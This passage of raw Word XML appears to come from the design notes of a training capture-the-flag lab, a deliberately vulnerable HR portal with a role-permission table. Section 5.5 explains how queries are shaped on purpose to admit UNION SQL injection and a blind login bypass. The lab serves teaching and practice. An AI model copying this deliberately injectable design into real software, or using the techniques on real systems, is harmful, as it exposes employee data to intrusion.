          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Payroll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IT Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>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r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1368"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="605"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 Why a few things are built the way they are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>One persistent sqlite connection, not per-request.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The original hr-portal.html lab rebuilt an in-memory database on every single call — fine for a handful of rows, dead on arrival at 1,000+ employees / 2,000+ audit rows. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib/peoplehub/db.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> opens once at first use and is reused; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>closeDb()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exists solely so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/ctf-admin.html</w:t>
      </w:r>
      <w:r>
        <w:t>’s reset button can hand the file back to the seed script without a server restart.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>List queries fetch everything and paginate in JS, for the vulnerable endpoints specifically.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A separate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>COUNT(*)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> query plus a paginated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>different column counts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a UNION payload sized to satisfy one breaks the other, since they run in sequence and the first failure wins. Collapsing to one unbounded query, sliced in application code, means there’s only one query shape a payload ever needs to match. (Documents’ list view doesn’t have this problem because it isn’t meant to be injectable — its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is properly parameterized.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Discovery flags are content-based, not shape-based, where it matters.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLite UNION always keeps the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT’s column names, regardless of what the injected SELECT actually returns — so checking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'columnName' in row</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can never detect a UNION injection. Reports and HR Requests check the actual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead (is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>metric_value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a real number? does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>employee_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> match the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SD-#####</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> format?).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Seed insertion order controls the login bypass’s blast radius.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns whichever row SQLite naturally encounters first — insertion order, for an unmodified table. Employee/Manager seats are seeded before Administrator ones specifically so the five-second blind payload doesn’t also happen to be the fastest way to full admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Resetting for a fresh run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">See README.md § Resetting — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/ctf-admin.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (localhost only) for a live, no-restart reset, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>npm run seed:peoplehub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the command line (stop the server first on Windows; SQLite file locking).</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23B78"/>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23B78"/>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23B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